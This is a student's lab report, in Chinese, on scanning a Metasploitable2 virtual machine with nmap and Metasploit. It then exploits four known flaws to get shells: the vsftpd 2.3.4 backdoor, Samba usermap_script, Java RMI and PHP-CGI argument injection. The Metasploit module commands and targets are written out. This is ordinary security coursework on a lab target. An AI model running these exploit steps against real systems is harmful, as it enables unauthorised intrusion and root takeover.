当前位置: 首页 > news >正文

20232310 2025-2026-1 《网络与系统攻防技术》实验六实验报告

1.实验内容

1.对给定Metasploitable2靶机进行发现,以及端口和漏洞扫描;

2.通过下面四个漏洞的渗透攻击从而掌握Metasploit的用法:

  • Vsftpd源码包后门漏洞;

  • Samba MS-RPC Shell命令注入漏洞;

  • Java RMI SERVER命令执行漏洞;

  • PHP CGI参数执行注入漏洞。

2.实验目的

掌握metasploit的用法,了解各种漏洞。

3.实验环境

kali虚拟机以及Metasploitable2虚拟机配置
image
image

4.实验过程与分析

安装https://docs.rapid7.com/metasploit/metasploitable-2-exploitability-guide/的压缩包,解压。
只需要使用vmware的打开,进入解压后的目录,选择打开即可。
image

4.1 前期渗透
4.1.1 主机发现
首先在给定的Metasploitable2主机上获取IP地址,以便于后期进行扫描
ip地址是192.168.80.145。
屏幕截图 2025-11-17 132222

可以ping通
屏幕截图 2025-11-17 132432

在kali虚拟机中输入msfconsole,执行ARP扫描。

msfconsole  
search arp_sweep  #搜索ARP扫描相关辅助模块
use 0 
set RHOSTS 192.168.80.0/24  #扫描虚拟机所在的网段
run  

屏幕截图 2025-11-17 132829
从扫描结果来看,靶机192.168.80.145处于在线状态,且标识为VMware, Inc.,说明这是一台VMware虚拟机。

4.1.2 端口扫描
使用nmap进行端口扫描,通过命令nmap -sS -sV 192.168.80.145进行SYN扫描。
根据nmap的扫描结果可以看出靶机上开放了大量的端口,同时存在一些漏洞。
屏幕截图 2025-11-17 132943

Metasploit的功能是很多的,我们不妨使用它来试试tcp扫描

use auxiliary/scanner/portscan/tcp #TCP端口扫描模块
set RHOSTS 192.168.80.145          #设置目的IP
set THREADS 15                     #并发,提升扫描速度
run

屏幕截图 2025-11-17 133233

4.1.3 漏洞扫描
输入命令nmap -script=vuln 192.168.80.145对靶机进行漏洞扫描.
屏幕截图 2025-11-17 133958
发现了很多漏洞,接下来我们一一来看。
(1)21端口的FTP服务存在vsFTPd2.3.4版本的后门漏洞(CVE-2011-2523),漏洞源于版本被恶意植入后门代码,攻击者通过含“😃”的特殊用户名登录即可触发,远程执行任意命令并获取root权限。
屏幕截图 2025-11-17 134007

(2)25端口存在ssl-dh-params漏洞,也就是匿名Diffie-Hellman密钥交换中间人漏洞,采用匿名DH交换的TLS服务仅能防御被动窃听,易被主动中间人攻击,完全破坏会话数据的保密性与完整性。
屏幕截图 2025-11-17 134248
还有Logjam漏洞,CVE-2015-4000。TLS协议处理DHE_EXPORT密码套件的Diffie-Hellman密钥交换时存在缺陷,攻击者可将TLS会话安全性降级至512位弱加密,进而破解、监控或篡改加密流。
屏幕截图 2025-11-17 134300
还有Diffie-Hellman密钥交换组强度不足漏洞。就是TLS服务使用强度不足的Diffie-Hellman组,易遭受被动窃听攻击,导致加密通信被破解。
屏幕截图 2025-11-17 134313

(3)80端口的HTTP服务存在这些风险:一是HTTPTRACE方法处于启用状态,该方法可能被攻击者利用来获取用户cookie等敏感信息;二是枚举到多个敏感路径,比如phpinfo.php会泄露服务器配置详情,phpMyAdmin作为数据库管理入口易成为攻击目标,还有/doc/、/icons/等可列目录的文件夹,会暴露服务的文件结构。
屏幕截图 2025-11-17 134336

(4)1099端口的rmi-registry服务存在默认配置远程代码执行漏洞,因默认允许从远程URL加载类,攻击者可利用该缺陷远程执行代码,获取系统控制权。
屏幕截图 2025-11-17 134527

(5)5432端口的postgresql服务存在SSLPOODLE信息泄露漏洞(CVE-2014-3566),SSL3.0协议的非确定性CBC填充有缺陷,中间人可通过填充预言机攻击获取通信明文;还存在Diffie-Hellman密钥交换组强度不足漏洞,TLS服务使用弱Diffie-Hellman组,易遭被动窃听导致加密通信被破解。
屏幕截图 2025-11-17 134714

此外该端口postgresql服务存在SSL/TLS中间人漏洞(CVE-2014-0224,ssl-ccs-injection),OpenSSL在处理ChangeCipherSpec消息时存在缺陷,攻击者可通过中间人攻击触发使用零长度主密钥,进而劫持会话或窃取敏感信息。
屏幕截图 2025-11-17 134723

(6)8180端口存在两类风险:一是检测到多个可能的admin管理目录(如/admin下的各类html、jsp文件),还暴露了FCKeditor组件的文件上传路径,这些入口易被攻击者利用,尝试未授权访问或上传恶意文件;二是存在Slowloris拒绝服务漏洞(CVE-2007-6750),攻击者可通过维持大量半开连接、发送部分请求来耗尽服务器资源,导致服务瘫痪。
屏幕截图 2025-11-17 134742

4.2 Vsftpd源码包后门漏洞(21端口)
输入nmap -sV -p 21 192.168.80.145扫描靶机的21端口。
发现该端口开放,且运行的是vsftpd 2.3.4
屏幕截图 2025-11-17 134823

使用Metasploit框架利用vsftpd 2.3.4版本后门漏洞

use exploit/unix/ftp/vsftpd_234_backdoor 
set RHOSTS 192.168.80.145
run

成功获得靶机的shell。查看当前用户发现为id=0的root用户,回显我自己的学号20232310。
image

4.3 SambaMS-RPC Shell命令注入漏洞(端口139)
输入nmap -p 139 192.168.80.145扫描靶机的139端口。开放
屏幕截图 2025-11-17 135236

Metasploit构造利用Samba服务的usermap_script漏洞。

use exploit/multi/samba/usermap_script 
set RHOST 192.168.80.145
run

获得靶机的shell。查看当前用户发现为root用户,
image

4.4 Java RMI SERVER命令执行漏洞(1099端口)
输入nmap -p 1099 192.168.80.145扫描靶机的1099端口。开放
屏幕截图 2025-11-17 135446

使用Metasploit框架利用Java RMI服务的远程代码执行漏洞

use exploit/multi/misc/java_rmi_server 
set RHOST 192.168.80.145
show options 
run

image

连接靶机的Meterpreter会话。输入shell后可以切换到交互式Shell中。可以发现是root用户,当前目录等命令均可执行。
image

4.5 PHP CGI参数执行注入漏洞(80端口)
输入nmap -p 80 192.168.80.145扫描靶机的80端口.开放
屏幕截图 2025-11-17 135911

使用Metasploit框架利用PHP-CGI的参数注入漏洞。

use exploit/multi/http/php_cgi_arg_injection
set RHOST 192.168.80.145
run

连接靶机的Meterpreter会话。输入shell后可以切换到交互式Shell中。
发现这里的用户是www-data,目录也不是根目录了,是/var/www。但是像ls之类的命令还是可以执行的
屏幕截图 2025-11-17 140120

5.问题及解决

基本上没什么问题,难度不是很大。就是那些漏洞不熟悉,但是老师的作业要求写的挺详细的。
部分需要询问ai,然后就能分析和找到对应模块。

6.心得体会

本次实验主要就是使用metasploit。前几次实验的漏洞攻击的时候,我在翻看csdn时就发现metasploit有很多强大的功能,果然,这次实验就基本聚焦于metasploit的使用了。(感觉这些模块真的很好用,就是不知道实际工程环境里面还有没有效果)
本次实验的难度相对之前几次降低了不少,我认为主要是我们统一安装的特定靶机不会像现实情况里那样受到环境、版本等因素的干扰。靶机的漏洞很多而且很明显,方便我们进行实验。
总的来说,我的收获很大。虽然这次实验主要是使用工具进行的攻击,但是我使用之余还进行了查询,稍微了解了一下具体的原理。我之前就听说,有一些低级的黑客是只会使用工具的“菜鸟”,这么说来,我也算是迈入初级的“黑客”行列了?hhh
我以后一定要好好学习网络攻防技能,不断进步!

http://www.jsqmd.com/news/42731/

相关文章:

  • 2025年环形导轨输送线直销厂家权威推荐榜单:环形导轨/圆弧导轨/ 环形导轨生产线源头厂家精选
  • Bootstrap在MySQL数据管理中作用大吗
  • PlantAssistant-管道数据文件PCF
  • Homework - Section Three
  • 【HD200I A2(8T)】青翼凌云科技-基于昇腾 310B 的智能计算模组
  • 2025 年尼龙扎带厂家最新推荐排行榜:不锈钢扎带、线卡、定位片等配件源头厂家权威测评推荐尼龙扎带厂家推荐
  • STM32 缓上电导致死机的问题分析
  • 2025! jenkins 添加节点
  • wtl with visual studio 2022
  • 生成用于验证 TDM slot 配置的波形
  • 20251117noip模拟赛
  • Bootstrap在MySQL应用中有何优势
  • blob字段在oracle中如何进行索引
  • [Python刷题记录]-多数元素-技巧-简单
  • 2025年武汉喷码机厂家最新企业推荐榜,油墨喷码机/手持喷码机/日期喷码机/喷码机维修/聚焦服务品质与产品竞争力深度剖析
  • 2025年国货抗老面霜哪家值得入?淡纹紧致/敏感肌适用/高保湿抗初老,实力品牌推荐
  • 算法可视化平台 - 让算法学习变得直观生动
  • 2025年智慧客房系统供应商口碑排行榜Top10权威发布
  • 2025年智慧客房系统供应商口碑推荐榜单TOP10权威发布
  • 2025 最新推荐!清理工具权威榜单,甄选云端管理 + 深度优化 + 安全防护全能型应用云储存 / 谷歌云盘 /icloud 储存空间 /macOS/ 苹果笔记本清理推荐
  • 2025年浙江自助免费建站公司权威推荐榜单:智能建站模板/ai建站平台/ ai自助建站源头公司精选
  • 2025年苏州森系婚礼跟拍公司权威推荐:城市街拍婚纱照/海边婚纱照/教堂婚礼拍摄源头服务机构精选
  • 2025年知识变现新蓝海:阿卡德平台——普通人逆袭的黄金赛道
  • [Python刷题记录]-翻转二叉树-二叉树-简单
  • 2025年11月美胸护理品牌评测:五强口碑榜与性能对比报告
  • 2025年抗老化污水池盖板实力厂家权威推荐榜单:玻璃钢格栅地沟盖板/化工污水池盖板/ 防滑玻璃钢盖板源头厂家精选
  • GPIO(下) - LI,Yi
  • 2025年11月认证开创者机构评测榜:尚普咨询集团和华信人对比
  • 2025年小型氦气纯化系统制造厂权威推荐:氘气回收纯化系统/PSA制氮设备/电解水制氢设备源头厂家精选
  • MATLAB利用遗传算法(GA)搜索图像融合的最优参数